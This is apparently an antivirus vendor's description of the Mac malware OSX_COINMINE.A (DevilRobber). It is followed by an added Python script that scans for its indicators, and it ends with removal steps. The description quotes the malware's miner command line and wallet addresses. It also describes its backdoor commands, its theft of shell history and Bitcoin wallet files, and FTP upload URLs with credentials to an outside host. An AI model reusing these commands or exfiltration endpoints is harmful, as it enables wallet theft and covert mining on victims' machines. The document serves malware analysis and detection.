OSX_COINMINE.A
Aliases: Backdoor:MacOS_X/DevilRobber.A (Microsoft)
Platform: Mac OS X
Threat Type: Spyware
Destructiveness: No
Encrypted: Yes
In the wild: Yes
OVERVIEW
This spyware executes a Bitcoin miner daemon by running a certain command. It executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing command-line parameters. It creates a text file dump.txt that contains certain information. It zips the file dump.txt to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip by running a command. It uploads {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip to FTP servers.
This Spyware may arrive bundled with malware packages as a malware component. It may be downloaded by other malware/grayware from remote sites.
It executes commands from a remote malicious user, effectively compromising the affected system.
TECHNICAL DETAILS
File Size: Varies
File Type: Mach-O, Script
Memory Resident: Yes
Initial Samples Received Date: 02 Nov 2011
Payload: Creates files
Arrival Details
This Spyware may arrive bundled with malware packages as a malware component.
It may be downloaded by the following malware/grayware from remote sites:
- TROJ_COINMINE.A
Backdoor Routine
This Spyware opens the following port(s) where it listens for remote commands:
- TCP port 34123
It executes the following commands from a remote malicious user:
- 1 - execute a command and return the result to the remote client
- 2 - take a screenshot by running the command screencapture -T 0 -x 1.png, uuencode the file 1.png to s.txt, send s.txt to the remote client, and delete 1.png and s.txt after sending
- any other command - close the connection
NOTES:
It executes a Bitcoin miner daemon by running the following command:
- ./minerd --url http://su.mining.eligius.st:8337 --userpass {Bitcoin host user name}:123 --algo cryptopp_asm32
It executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing the following command-line parameters:
- -u {Bitcoin host user name} -p 123 -o su.mining.eligius.st -r 8337 -v 2 -f 20
{Bitcoin host user name} can be any of the following:
- 16i22nMinPcWf5UUSVNWBosZbQ65DsfiAX
- 15DzENUPvq3TSsnr4QgMFY8L8mih1MRpi1
- 1FNnnNMDoPQA2PwHJaK3cZZSTcWq42GRTh
It creates a text file dump.txt that contains the following information:
- Number of files whose file name contains truecrypt
- Number of files whose file name contains pthc
- Number of files whose file name contains vidalia
- The entire contents of the file /Users/{user name}/.bash_history
- The entire contents of the file /Users/{user name}/Library/Application Support/Bitcoin/wallet.dat, if it exists
It zips the file dump.txt to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip by running the following command:
- zip -r -X {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip dump.txt
It uploads {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip to the following FTP servers:
- ftp://bubba47:semiram237@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
- ftp://acab73:boss583@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
- ftp://manamar489:most832@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
It drops the file status.cfg which contains its current configuration.
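Added example (not part of the Trend Micro description): a small host-triage script that checks a process listing, a listening-socket listing and a set of file paths against the indicators listed above. The `ps -axo pid,command` and `lsof -nP -iTCP -sTCP:LISTEN` line formats and all sample data are constructed assumptions.

```python
import re

MINER_POOL = "su.mining.eligius.st"          # pool named in the minerd / DiabloMiner.jar command lines
BACKDOOR_PORT = 34123                        # TCP port the backdoor listens on
DROPPED_NAMES = {"dump.txt", "status.cfg"}   # artefacts the sample writes to disk
# {hex}_{hex}_{hex}.zip naming used for the exfiltration archive
ARCHIVE_RE = re.compile(r"^[0-9a-f]+_[0-9a-f]+_[0-9a-f]+\.zip$", re.IGNORECASE)
LISTEN_RE = re.compile(r"TCP \S*:(\d+) \(LISTEN\)")   # assumed lsof output shape

def process_indicators(ps_lines):
    """Flag miner command lines that point at the pool named on the page."""
    hits = []
    for line in ps_lines:
        if MINER_POOL in line and ("minerd" in line or "DiabloMiner.jar" in line):
            hits.append("miner process: " + line.strip())
    return hits

def listener_indicators(lsof_lines):
    """Flag any process listening on the backdoor port (first column is COMMAND)."""
    hits = []
    for line in lsof_lines:
        m = LISTEN_RE.search(line)
        if m and int(m.group(1)) == BACKDOOR_PORT:
            hits.append("backdoor listener: " + line.split()[0])
    return hits

def file_indicators(paths):
    """Flag dropped files and the randomly named exfiltration archive."""
    hits = []
    for p in paths:
        name = p.rsplit("/", 1)[-1]
        if name in DROPPED_NAMES or ARCHIVE_RE.match(name):
            hits.append("dropped file: " + p)
    return hits

def triage(ps_lines, lsof_lines, paths):
    return process_indicators(ps_lines) + listener_indicators(lsof_lines) + file_indicators(paths)

# Constructed sample data (not real telemetry); {user name placeholder} stands in for the wallet address
SAMPLE_PS = [
    "  101 /usr/libexec/foo",
    "  202 ./minerd --url http://su.mining.eligius.st:8337 --userpass {user name placeholder}:123 --algo cryptopp_asm32",
]
SAMPLE_LSOF = [
    "COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME",
    "devil   202 user 5u IPv4 0x1 0t0 TCP *:34123 (LISTEN)",
    "sshd     50 root 3u IPv4 0x2 0t0 TCP *:22 (LISTEN)",
]
SAMPLE_FILES = ["/Users/alice/Desktop/notes.txt", "/tmp/dump.txt", "/tmp/3f2a_9b1c_77de.zip", "/tmp/status.cfg"]

if __name__ == "__main__":
    for hit in triage(SAMPLE_PS, SAMPLE_LSOF, SAMPLE_FILES):
        print(hit)
```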
SOLUTION
Minimum Scan Engine: 9.200
First VSAPI Pattern File: 8.560.05
First VSAPI Pattern Release Date: 09 Nov 2011
VSAPI OPR Pattern Version: 8.561.00
VSAPI OPR Pattern Release Date: 10 Nov 2011
Step 1
Remove the malware/grayware file that dropped/downloaded OSX_COINMINE.A. (Note: Please skip this step if the threat(s) listed below have already been removed.)
Step 2
Remove the malware/grayware file dropped/downloaded by OSX_COINMINE.A. (Note: Please skip this step if the threat(s) listed below have already been removed.)
Step 3
Restart in normal mode and scan your computer with your Trend Micro product for files detected as OSX_COINMINE.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.